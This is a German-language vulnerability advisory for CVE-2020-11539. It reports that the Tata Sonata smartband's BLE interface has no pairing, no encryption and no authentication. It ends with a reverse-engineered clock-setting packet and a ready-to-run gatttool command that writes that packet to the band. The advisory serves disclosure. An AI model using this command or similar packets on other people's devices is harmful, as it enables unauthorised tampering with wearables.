
Unzureichende Zugriffskontrolle in der Tata Sonata Smartband
Beschreibung: Es wurde festgestellt, dass das Smartband keine Kopplung (Sicherheitsstufe 0 von BLE) aufweist. Die über die Luft übertragenen Daten sind nicht verschlüsselt. Hinzu kommt, dass die an das Smartband gesendeten Daten keine Authentifizierung oder Signaturprüfung haben, wodurch jeder Angreifer die Parameter des intelligenten Geräts steuern kann.
Betroffene Versionen: Smart SF Rush - 1.12
Forscher: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
Das folgende Paket wurde reverse-engineered und dient zum Ändern der Uhrzeit. Weitere Pakete können durch Extrahieren des hcisnoop-Dumps von Ihrem Telefon reverse-engineered werden.
Datenwert: 00870e00141401060712052b051e
| Hexdump der Daten: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Dezimalwert der Daten: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: Header des Pakets
0e 00: Typ des Pakets
14 14: Jahr in Hex (2020)
01 06: Monat und Tag (6. Januar)
07 12: Stunde und Minute in Hex (07:18 Uhr)
05 : Sekunden
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e